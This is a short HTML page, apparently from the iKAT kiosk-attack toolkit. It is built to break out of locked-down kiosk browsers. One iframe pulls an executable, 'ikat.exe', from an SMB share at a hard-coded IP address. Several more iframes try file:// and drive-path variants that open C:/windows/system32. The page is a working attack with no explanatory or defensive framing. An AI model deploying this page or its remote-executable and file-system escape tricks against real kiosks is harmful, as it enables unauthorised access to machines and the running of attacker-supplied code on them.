<html>
<head>
<link rel="stylesheet" type="text/css" media="screen" href="/css/style.css" />
</head>

<body style="background: white;">


<div id="mselect">

<p><strong>iKAT Agent From SMB Share</strong></p>
<iframe src="file://///120.138.22.77\ikat\ikat.exe"></iframe>

<p><strong>File System Links</strong></p>
<p>C:\windows/system32/</p>
<iframe src="C:\windows/system32/"></iframe>
	
<p>file://C:/windows/system32</p>
<iframe src="file://C:/windows/system32"></iframe>
	
<p>file:/C:/windows/system32\</p>
<iframe src="file:/C:/windows/system32\"></iframe>
	
<p>file://C:/windows/system32</p>
<iframe src="file://C:/windows/system32"></iframe>
	
<p>file://C:/?http://</p>
<iframe src="file://C:/?http://"></iframe>
	
<p>file://C:/?https://</p>
<iframe src="file://C:/?https://"></iframe>

</div>

</body>
</html>

